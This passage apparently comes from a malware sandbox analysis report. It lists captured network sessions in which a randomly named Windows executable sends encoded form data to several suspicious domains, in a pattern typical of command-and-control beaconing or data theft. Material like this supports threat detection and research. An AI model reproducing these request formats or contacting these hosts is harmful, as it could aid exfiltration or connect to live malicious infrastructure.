                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jK6GRdkqr0V%2FcubRNuuDf7if%2BJagemLfpk3Qgir8VQFqkKxNWsRpTkr2sVxR0BKNkIvwM6iXmkHDZzjG3b2zNx6AZTjCDN%2FqEnKG6VD2q0FjuHfJOqnR4R%2BH2NwreTuYE7iXNUSPQV%2BfxE4%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570b1f2af441c3-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2051&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                      Data Ascii: 14
                                                                      Nov 20, 2024 09:24:24.418519020 CET5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.1049999188.114.97.3806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:26.367635012 CET1808OUTPOST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 30 78 55 31 59 73 49 69 68 65 2f 34 32 6b 79 57 45 4b 6d 4f 36 46 4e 48 71 62 33 36 36 44 58 66 61 75 6d 36 4f 2f 64 4e 69 48 57 65 30 57 41 58 48 4e 78 6a 6e 4b 55 4b 32 34 58 6e 50 31 4c 65 4b 53 32 57 67 6f 33 6b 33 6b 66 72 54 75 54 73 4a 57 5a 34 6e 2b 50 73 34 2f 69 48 4c 6c 2f 65 4c 53 6e 45 46 73 69 62 6d 52 67 74 75 44 66 53 51 69 62 57 42 4d 4a 56 32 63 43 64 6a 6b 4e 72 48 52 61 73 62 77 6e 34 43 56 33 55 55 6d 74 56 64 48 49 45 47 68 76 6c 63 71 33 5a 7a 70 46 37 4e 71 78 73 72 6c 73 4b 56 32 61 56 4f 61 4d 71 68 4f 54 2b 54 35 56 62 43 46 36 52 68 6f 76 34 39 62 61 4c 49 47 54 45 45 51 6b 39 61 73 53 4c 31 56 73 49 2f 65 43 72 34 77 38 63 58 37 44 6d 35 55 6c 45 47 77 51 38 75 33 36 63 2b 6d 70 76 77 54 58 30 4f 67 4a 70 71 76 64 53 50 49 52 4c 38 64 36 63 56 42 6e 7a 44 48 6a 47 6f 55 6f 35 32 37 58 2b 72 32 45 6e 63 47 2b 6b 64 42 70 53 4e 36 36 [TRUNCATED]
                                                                      Data Ascii: prh4=d0s7zQQQrb6Semh9S4wmpNdBLkiNGMliAwKogckw3g0xU1YsIihe/42kyWEKmO6FNHqb366DXfaum6O/dNiHWe0WAXHNxjnKUK24XnP1LeKS2Wgo3k3kfrTuTsJWZ4n+Ps4/iHLl/eLSnEFsibmRgtuDfSQibWBMJV2cCdjkNrHRasbwn4CV3UUmtVdHIEGhvlcq3ZzpF7NqxsrlsKV2aVOaMqhOT+T5VbCF6Rhov49baLIGTEEQk9asSL1VsI/eCr4w8cX7Dm5UlEGwQ8u36c+mpvwTX0OgJpqvdSPIRL8d6cVBnzDHjGoUo527X+r2EncG+kdBpSN66Ss/Gp9WqUQRIAlUOJWk6tqeva5dV/Maln9hu8c9LxP1E7gOfzCD85rLYw+1MZJgLu3o+y/dlfpwwjrpO+LUF9udzDT6atnyAAiSh3e7WDfSiswDmAdRXHwVwl/lE3ddCQeOfLvsbigwIlFI0bAq0zaRCeCcSZ8wPMbee62H2NCE3afvZRsxUxCRNp7JTPLHvOJ+Ystuquu2/qEExPFAoFtsFdVre3D1m5h2nuMjB0srgrVAh/xTBep7kGKo6Ijh7xB7Yu8/0L95UnPnX9KiyYEg001MC0VWDBi6znQfXl90ey5kI4SWejlcc3Hojq8/yYuTeLdo5zXRvkLWdaghyDOARoy+Qx0WC60Bdy0cn06meggOU3x4Y04ply+kPnvUuJlLyO1CwboxXz+9aGEjJHr3hnhDfXO/r1QmyZLWRP4nRN2cAnMwg1U0DHtBYUBhPI0dpBmseNnGDiTcxXbQh+SQ8P+LQzoYr1rizAoV8iP9dt5/IrSHczfKzI+d/PuiXtW/IGypPbkl6KYcN+FQUYFHiUucvr7cL5m4vyGqUUk4pXNAEXeY+1hFPy2VPh03xAEfJHapJ0AMv7FLTjDRkIRMV5FWKwy9xjswwsRJZelA4/pyNMTEyRu4M3flhtTnICONQSPrYLEpEfl+DfJVcizLlQsQ4PCiU5Q [TRUNCATED]
                                                                      Nov 20, 2024 09:24:26.987242937 CET832INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJxT0vs2sBoFq%2F3eft%2B6AfUPnysfAHJBCvGAXR80Koy0%2FbrZY2434rmA6GFJH8WqJtN6e0WLb3X77yochaZp35cAK3bRae%2BiD9qgDPT0O0bVo1%2BAyiS%2F6MHwQbmTmFv6m5vgjmGzxp8KcMw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570b2f39057c82-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1787&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1808&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 140


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.1050000188.114.97.3806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:28.911557913 CET501OUTGET /2nga/?prh4=Q2EbwnYhq4vEVEYycJMqtdR4BlKtLPQlBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63UJrhBCWi6xUDdTpqdehfcV6DO82Y8sA==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:24:29.561872005 CET777INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYIazJ6H8qLVrGgl05NVc8nJBB6mtPopQ03p%2FT4WiLATGV9QSZHnsehaMr7VOY2Z2HjM8TrPtHwV%2FXP3s4RW1I%2FyIkJuJlAVLl3LNlGUf5uByvMkC8y4tVRUWI235p7r3x%2FzK3b8AzjoKyo%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570b3f3ba8729f-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=501&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.1050001118.107.250.103806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:35.067323923 CET738OUTPOST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 64 2f 45 77 78 34 44 52 6f 79 68 6a 4c 45 76 36 34 43 64 6b 6d 7a 4e 65 4d 53 71 38 33 54 70 6a 78 31 59 6c 69 4e 71 47 63 58 68 55 76 2f 34 4f 64 4e 4d 4a 65 64 68 64 53 79 6b 2b 4b 31 52 55 6f 37 59 6e 4c 62 4c 7a 79 67 4d 42 59 71 45 35 44 73 42 6e 67 37 6f 6f 78 35 38 71 78 6c 43 73 62 55 79 69 37 41 32 68 56 74 74 69 6c 48 4d 4d 4b 34 4a 43 75 5a 2f 5a 6a 58 38 6e 6a 57 38 77 38 31 37 69 49 64 77 32 64 6d 47 54 30 6b 72 34 74 5a 35 4e 36 6d 6f 32 77 34 67 6e 62 4a 6a 6a 70 38 6c 68 59 76 4b 35 4f 55 41 49 4d 59 39 4e
                                                                      Data Ascii: prh4=8gHotV00muxVd/Ewx4DRoyhjLEv64CdkmzNeMSq83Tpjx1YliNqGcXhUv/4OdNMJedhdSyk+K1RUo7YnLbLzygMBYqE5DsBng7oox58qxlCsbUyi7A2hVttilHMMK4JCuZ/ZjX8njW8w817iIdw2dmGT0kr4tZ5N6mo2w4gnbJjjp8lhYvK5OUAIMY9N
                                                                      Nov 20, 2024 09:24:35.861618996 CET308INHTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 20 Nov 2024 08:23:39 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.1050002118.107.250.103806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:37.623658895 CET762OUTPOST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 39 6a 77 51 6b 6c 77 38 71 47 66 58 68 55 6b 66 35 4b 54 74 4d 53 65 64 6b 69 53 78 38 2b 4b 31 46 55 6f 35 51 6e 4c 4b 4c 79 67 41 4d 48 51 4b 45 2f 48 73 42 6e 67 37 6f 6f 78 35 6f 41 78 6c 61 73 61 6b 43 69 30 43 65 2b 57 74 74 68 78 58 4d 4d 4f 34 49 71 75 5a 2f 33 6a 54 39 76 6a 51 34 77 38 77 66 69 49 73 77 78 45 32 47 5a 37 45 72 71 68 35 30 55 39 44 34 74 39 4f 4d 50 4c 61 7a 52 6a 39 59 6d 4a 2b 72 75 64 6a 63 47 43 65 49 6e 4c 47 32 6c 52 64 69 6a 38 78 48 57 65 37 30 6d 38 71 6b 45 7a 41 3d 3d
                                                                      Data Ascii: prh4=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3h9jwQklw8qGfXhUkf5KTtMSedkiSx8+K1FUo5QnLKLygAMHQKE/HsBng7oox5oAxlasakCi0Ce+WtthxXMMO4IquZ/3jT9vjQ4w8wfiIswxE2GZ7Erqh50U9D4t9OMPLazRj9YmJ+rudjcGCeInLG2lRdij8xHWe70m8qkEzA==
                                                                      Nov 20, 2024 09:24:38.485940933 CET308INHTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 20 Nov 2024 08:23:41 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.1050003118.107.250.103806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:40.167831898 CET1775OUTPOST /gxyh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Origin: http://www.zxyck.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.zxyck.net/gxyh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 6c 6a 77 6d 77 6c 68 72 47 47 65 58 68 55 6e 66 35 4a 54 74 4e 49 65 5a 49 6d 53 32 31 44 4b 33 39 55 70 62 6f 6e 65 4f 58 79 35 77 4d 48 63 71 45 36 44 73 42 79 67 37 34 6b 78 35 34 41 78 6c 61 73 61 6d 61 69 77 51 32 2b 61 4e 74 69 6c 48 4d 32 4b 34 4a 48 75 5a 47 4b 6a 54 77 4e 69 67 59 77 38 51 50 69 4b 2b 59 78 62 6d 47 66 38 45 71 35 68 35 34 78 39 44 4d 50 39 4b 45 70 4c 61 37 52 75 70 64 73 4e 2f 37 6c 41 6b 73 41 4f 2f 46 45 41 32 54 5a 59 65 66 6e 38 6a 6d 4e 46 4a 31 4a 30 72 45 4a 67 79 51 46 67 33 75 58 70 31 53 69 73 52 74 32 62 41 59 61 44 36 64 39 4b 4a 42 6b 39 51 46 48 30 59 7a 34 67 54 4c 63 33 35 53 53 74 4c 46 32 34 6b 58 4f 63 4a 4a 41 32 58 44 64 46 63 59 34 34 65 38 6e 69 4e 47 2b 56 72 31 61 47 76 77 79 35 5a 61 34 46 4b 73 47 68 44 77 4a 53 52 49 76 34 55 33 4f 62 36 4d 7a 74 6f 5a 78 65 4c 53 6c 39 72 6c 4e 36 31 52 44 66 78 2b 51 35 [TRUNCATED]
                                                                      Data Ascii: prh4=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3hljwmwlhrGGeXhUnf5JTtNIeZImS21DK39UpboneOXy5wMHcqE6DsByg74kx54AxlasamaiwQ2+aNtilHM2K4JHuZGKjTwNigYw8QPiK+YxbmGf8Eq5h54x9DMP9KEpLa7RupdsN/7lAksAO/FEA2TZYefn8jmNFJ1J0rEJgyQFg3uXp1SisRt2bAYaD6d9KJBk9QFH0Yz4gTLc35SStLF24kXOcJJA2XDdFcY44e8niNG+Vr1aGvwy5Za4FKsGhDwJSRIv4U3Ob6MztoZxeLSl9rlN61RDfx+Q5JdCrQhH230x22bE6V+i146TvqPt9YOx0abyU5AigJlGV9dDrQ09V+wjtYzzOoj12fcc3aO8uLqQhVLCvaiv1EHp/zUeMRJ2U+dmhN/exVCHv6RbBZ1tx/wmnM4A2lVrxmJygSl054zLOwK6jfzlxjjcOzC4y1iU7RpHmYktAEFOJifOCPrEgWZYqMH6oiS9Iv4JH+KA7Usx8BHeUaCXget9uVQ3NSn+txtx8eLYfYdQioA0NqeTrjQFH4AJ6r7MNdhQBIztw7kXnYcqqwc+RmYbOJrEzdhYSjZb+KSTWM2Z0oxUQdqKFovZhdvHtmyTehbGYE2O6V22mKw3VUV+NcobcWsT+eozPOxzSa7GYZpG/tQxRSHDkebm0js4ooeyLg3bZjbuUIfN1/PdSX99b/ijkKOuKvV5BHAub1RX0QmGATRWBzQLeWcIRk9nKgA3OOM/a+kXCdpVqFUb1EXye9BZr0Yw8d+vJTZaXHC5um7FD11XKPkEL3RraDUllaIBxWD/7YElRAUC8NewYSykrCWCsfIJPwfBgpcjfexasyPH54/Tzw3qoQEmSzULPT4dWQ2uJH73c8tpbYMqNjicJXzvEsoiOCMukdeeGGZZ0H59EYQ7RX9FbAuLyYoUzTRYKFdt8Gh+Sf6GyrPRjTQwCs0kPAvlNQYaIkL [TRUNCATED]
                                                                      Nov 20, 2024 09:24:41.033252001 CET308INHTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 20 Nov 2024 08:23:44 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2e///l=,0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.1050004118.107.250.103806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:42.712119102 CET490OUTGET /gxyh/?prh4=xivIugper8hSVuoN4YvDvis0ACu7xzkGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT++SwIfOluLOgfprtVp+sbk1f1bmq9tA==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zxyck.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:24:43.602325916 CET266INHTTP/1.1 200 OK
                                                                      Server: Tengine
                                                                      Date: Wed, 20 Nov 2024 08:23:46 GMT
                                                                      Content-Type: text/html;charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Data Raw: 31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e 65 74 2f 67 78 79 68 2e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 1c/www/wwwroot/zxyck.net/gxyh.0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.1050005209.74.77.109806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:48.837893963 CET753OUTPOST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 47 33 42 44 6c 77 34 6a 6e 4d 64 35 76 78 2b 4a 50 69 6c 69 71 64 69 39 79 59 4a 61 56 68 50 71 76 6e 62 41 79 4f 78 7a 72 58 32 56 69 37 59 5a 69 59 47 39 33 6d 6b 4b 44 4b 69 6c 50 4c 41 68 4f 69 2b 36 34 34 41 36 63 42 30 57 45 57 70 6f 68 6d 34 6d 4e 77 65 64 64 47 74 6c 46 38 5a 62 55 65 50 4b 38 75 33 74 31 54 71 76 36 65 48 6d 45 76 65 6f 6f 77 76 48 46 4e 32 39 34 4e 54 75 61 35 76 37 6a 54 6f 46 4e 77 6d 72 34 73 67 6e 77 4c 75 36 65 66 48 74 2b 62 35 2f 54 70 79 43 76 56 4d 77 72 4a 6e 50 78 51 30 45 46 61 76
                                                                      Data Ascii: prh4=N+9LpEXYE/G8IG3BDlw4jnMd5vx+JPiliqdi9yYJaVhPqvnbAyOxzrX2Vi7YZiYG93mkKDKilPLAhOi+644A6cB0WEWpohm4mNweddGtlF8ZbUePK8u3t1Tqv6eHmEveoowvHFN294NTua5v7jToFNwmr4sgnwLu6efHt+b5/TpyCvVMwrJnPxQ0EFav
                                                                      Nov 20, 2024 09:24:49.431021929 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:49 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      30192.168.2.1050006209.74.77.109806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:51.385857105 CET777OUTPOST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
